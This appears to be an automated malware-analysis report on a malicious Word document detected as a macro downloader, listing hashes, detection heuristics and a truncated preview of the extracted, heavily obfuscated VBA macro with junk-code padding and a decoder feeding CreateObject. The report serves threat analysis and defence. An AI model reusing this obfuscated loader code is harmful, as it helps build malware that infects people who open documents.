Office (OLE) malware analysis — malicious · 5cdfb95ff096adb5

MALICIOUS

Office (OLE)

156.1 KB Created: 2019-10-24 16:48:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: abe66d000ab954f1e2ef53b2a8423241 SHA-1: eac5ee82924f15091b90bc22c9a06676c40d04f8 SHA-256: 5cdfb95ff096adb5ce4140f5f84b7f4d32fe17ced178f1e11c955f3846996da6

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains a heavily obfuscated VBA macro with an AutoOpen function, indicative of a downloader. The macro utilizes CreateObject and execution functions, suggesting it attempts to download and run a secondary payload. ClamAV also identified it as a generic downloader.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7356067-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7356067-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40304 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40304 bytes
SHA-256: `1e2736760bd3c1fb4f8f78fbe9ee15ca824cb8a46b66330baaf2e95f65fad680`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Siyhmqighwa" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Thmguhieggyj, 0, 0, MSForms, CommandButton" Attribute VB_Control = "Wiqtpyqtmclni, 1, 1, MSForms, CommandButton" Attribute VB_Control = "Xsjogrtybffqy, 2, 2, MSForms, CommandButton" Attribute VB_Control = "Zqkpnawh, 3, 3, MSForms, CommandButton" Attribute VB_Control = "Ensbugofql, 4, 4, MSForms, CommandButton" Attribute VB_Control = "Yictvccuuwxpj, 5, 5, MSForms, CommandButton" Attribute VB_Control = "Hhruynkwjh, 6, 6, MSForms, CommandButton" Attribute VB_Control = "Nbzlbcbnfscr, 7, 7, MSForms, CommandButton" Attribute VB_Name = "Hcpsmkkdq" Function qiwhdjkasd(qiwhdjkasdA) On Error Resume Next ''''''Jagodzinski, Adamiec and Lisowski Suite 817 Northeast Kowal Inc Suite 493 Northwest ''''''Cybulski Inc Apt. 279 East Wesolowski, Sawicki and Chmiel Suite 107 Southwest Kxflvppplsji = Log("Mozilla/5.0 (Windows NT 6.0; WOW64; rv:10.6) Gecko/20100101 Firefox/10.6.8") Vdnkdmqss = Atn(Dyiutqntj) Elhorgdc = "Schultz LLCSuite 392Southwest" ''''''Orzechowski, Frankowski and Fratczak Apt. 026 West Klosowski - Koziel Apt. 791 North Niiiontpereu = Sin(310) ''''''Jarosz Inc Apt. 550 South Zielonka, Kowalski and Orzechowski Suite 133 Southeast Qhurbwocauzc = CLng(Vkppsoqqzlf) Dfqwkgqxkllb = CInt(333) ''''''Jezierski - Czajkowski Suite 008 West Kopczynski, Lech and Skowronek Suite 079 Southeast ''''''Stanislawski, Misiak and Stachura Apt. 018 North Szymczyk Inc Suite 210 Northwest Kinjmleuu = Rnd(Cpbahjmydkx) Ovmrkydowjfil = Sin(176) ''''''Paszkowski Inc Suite 223 Southeast Filipiak, Miskiewicz and Mucha Apt. 866 Southeast Sojlnhiqoxcc = "Mozilla/5.0 (Windows NT 5.3; WOW64; rv:15.3) Gecko/20100101 Firefox/15.3.3" Sumypuqy = Vzaffwswgt ''''''Makowski Group Suite 229 Northwest Wypych, Bartczak and Kosowski Suite 137 Southwest Bmwqgeytiwd = Sgn("Towels") Psjvibtb = Sqr(Nhcksfgwfve) Cznmatby = "Chips" ''''''Drozd, Wojciechowski and Józwik Suite 520 Northeast Mikulski, Jagielski and Skowronski Apt. 239 Southwest Cqdiaxrnncw = Tan(763) Set qiwhdjkasd = CreateObject(Qwxlkupcbtk(Qwxlkupcbtk(qiwhdjkasdA))) ''''''Gasior - Piwowarczyk Suite 408 South Janik and Sons Suite 028 West ''''''Kulig, Sosnowski and Malec Suite 959 Southeast Kruszewski - Kowalewski Apt. 670 Southwest Zebdtcncvm = CStr("Swaniawski, McLaughlin and HayesApt. 364Southwest") Nxnyqeucgkvsj = Sin(Vugzsvuojdi) Pvyhfyoeiefgu = "Von GroupApt. 729North" ''''''Pietras and Sons Apt. 978 West Graczyk Group Suite 683 West Oiitvorip = CSng(120) ''''''Jagielski - Stachowiak Suite 416 Northwest Gajewski, Bielak and Orzechowski Apt. 164 South Bsjeuhzymlmnn = CInt(Jnqasxlpza) Jhymiuhwvve = CLng(89) ''''''Sobczak, Nowacki and Krawczyk Apt. 079 North Skiba - Michalowski Apt. 041 Southwest ''''''Krajewski, Andrzejczak and Madej Suite 097 Northeast Radomski, Gwózdz and Zak Apt. 543 Southeast Hwxtbvvilfeso = Log(Qckeztqq) Esfonojgclanw = Cos(618) ''''''Raczynski Group Apt. 206 West Wójtowicz - Dziedzic Apt. 155 West Zfycuutzh = "Schuppe, Mraz and MohrSuite 691South" Kzleqgjtxcqu = Ummjzdfmzan ''''''Grzegorczyk - Kepa Suite 366 Northwest Jedrzejczak - Adamowicz Suite 051 North Ueksxiudjvx = Rnd("Computer") Ecacilalzihq = CSng(Nyalrysp) Jtmdmlqoof = "Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/533.1.2 (KHTML, like Gecko) Chrome/33.0.806.0 Safari/533.1.2" ''''''Kapusta, Kowal and Krysiak Apt. 519 Southeast Kwiecien Inc Suite 161 Northwest Mwrcrcuw = Fix(193) End Function Function Stzzlrrct() On Error Resume Next ''''''Niewiadomski - Kisiel Apt. 534 North Przybylski Group Apt. 930 Southeast ''''''Kwiecien Group Apt. 048 North Zarzycki - Jasinski Apt. 614 Northwest Nzgpgcnxpre = Log("129.181.187.87") Turqmvlwuzs = Rnd(Ygeafcyhi) Wkxenutdj = "12.229.18.35" ''''''Wróblewski, Michalak and Wróbel Suite 04 ... (truncated)

SHA-256: 1e2736760bd3c1fb4f8f78fbe9ee15ca824cb8a46b66330baaf2e95f65fad680

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Siyhmqighwa"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Thmguhieggyj, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Wiqtpyqtmclni, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Xsjogrtybffqy, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Zqkpnawh, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Ensbugofql, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Yictvccuuwxpj, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Hhruynkwjh, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Nbzlbcbnfscr, 7, 7, MSForms, CommandButton"

Attribute VB_Name = "Hcpsmkkdq"
Function qiwhdjkasd(qiwhdjkasdA)
On Error Resume Next
   ''''''Jagodzinski, Adamiec and Lisowski Suite 817 Northeast Kowal Inc Suite 493 Northwest
''''''Cybulski Inc Apt. 279 East Wesolowski, Sawicki and Chmiel Suite 107 Southwest
Kxflvppplsji = Log("Mozilla/5.0 (Windows NT 6.0; WOW64; rv:10.6) Gecko/20100101 Firefox/10.6.8")
Vdnkdmqss = Atn(Dyiutqntj)
Elhorgdc = "Schultz LLCSuite 392Southwest"
''''''Orzechowski, Frankowski and Fratczak Apt. 026 West Klosowski - Koziel Apt. 791 North
Niiiontpereu = Sin(310)
''''''Jarosz Inc Apt. 550 South Zielonka, Kowalski and Orzechowski Suite 133 Southeast
Qhurbwocauzc = CLng(Vkppsoqqzlf)
Dfqwkgqxkllb = CInt(333)
''''''Jezierski - Czajkowski Suite 008 West Kopczynski, Lech and Skowronek Suite 079 Southeast
''''''Stanislawski, Misiak and Stachura Apt. 018 North Szymczyk Inc Suite 210 Northwest
Kinjmleuu = Rnd(Cpbahjmydkx)
Ovmrkydowjfil = Sin(176)
''''''Paszkowski Inc Suite 223 Southeast Filipiak, Miskiewicz and Mucha Apt. 866 Southeast
Sojlnhiqoxcc = "Mozilla/5.0 (Windows NT 5.3; WOW64; rv:15.3) Gecko/20100101 Firefox/15.3.3"
Sumypuqy = Vzaffwswgt
''''''Makowski Group Suite 229 Northwest Wypych, Bartczak and Kosowski Suite 137 Southwest
Bmwqgeytiwd = Sgn("Towels")
Psjvibtb = Sqr(Nhcksfgwfve)
Cznmatby = "Chips"
''''''Drozd, Wojciechowski and Józwik Suite 520 Northeast Mikulski, Jagielski and Skowronski Apt. 239 Southwest
Cqdiaxrnncw = Tan(763)
Set qiwhdjkasd = CreateObject(Qwxlkupcbtk(Qwxlkupcbtk(qiwhdjkasdA)))
   ''''''Gasior - Piwowarczyk Suite 408 South Janik and Sons Suite 028 West
''''''Kulig, Sosnowski and Malec Suite 959 Southeast Kruszewski - Kowalewski Apt. 670 Southwest
Zebdtcncvm = CStr("Swaniawski, McLaughlin and HayesApt. 364Southwest")
Nxnyqeucgkvsj = Sin(Vugzsvuojdi)
Pvyhfyoeiefgu = "Von GroupApt. 729North"
''''''Pietras and Sons Apt. 978 West Graczyk Group Suite 683 West
Oiitvorip = CSng(120)
''''''Jagielski - Stachowiak Suite 416 Northwest Gajewski, Bielak and Orzechowski Apt. 164 South
Bsjeuhzymlmnn = CInt(Jnqasxlpza)
Jhymiuhwvve = CLng(89)
''''''Sobczak, Nowacki and Krawczyk Apt. 079 North Skiba - Michalowski Apt. 041 Southwest
''''''Krajewski, Andrzejczak and Madej Suite 097 Northeast Radomski, Gwózdz and Zak Apt. 543 Southeast
Hwxtbvvilfeso = Log(Qckeztqq)
Esfonojgclanw = Cos(618)
''''''Raczynski Group Apt. 206 West Wójtowicz - Dziedzic Apt. 155 West
Zfycuutzh = "Schuppe, Mraz and MohrSuite 691South"
Kzleqgjtxcqu = Ummjzdfmzan
''''''Grzegorczyk - Kepa Suite 366 Northwest Jedrzejczak - Adamowicz Suite 051 North
Ueksxiudjvx = Rnd("Computer")
Ecacilalzihq = CSng(Nyalrysp)
Jtmdmlqoof = "Mozilla/5.0 (Windows; U; Windows NT 5.3) AppleWebKit/533.1.2 (KHTML, like Gecko) Chrome/33.0.806.0 Safari/533.1.2"
''''''Kapusta, Kowal and Krysiak Apt. 519 Southeast Kwiecien Inc Suite 161 Northwest
Mwrcrcuw = Fix(193)
End Function
Function Stzzlrrct()
On Error Resume Next
   ''''''Niewiadomski - Kisiel Apt. 534 North Przybylski Group Apt. 930 Southeast
''''''Kwiecien Group Apt. 048 North Zarzycki - Jasinski Apt. 614 Northwest
Nzgpgcnxpre = Log("129.181.187.87")
Turqmvlwuzs = Rnd(Ygeafcyhi)
Wkxenutdj = "12.229.18.35"
''''''Wróblewski, Michalak and Wróbel Suite 04
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.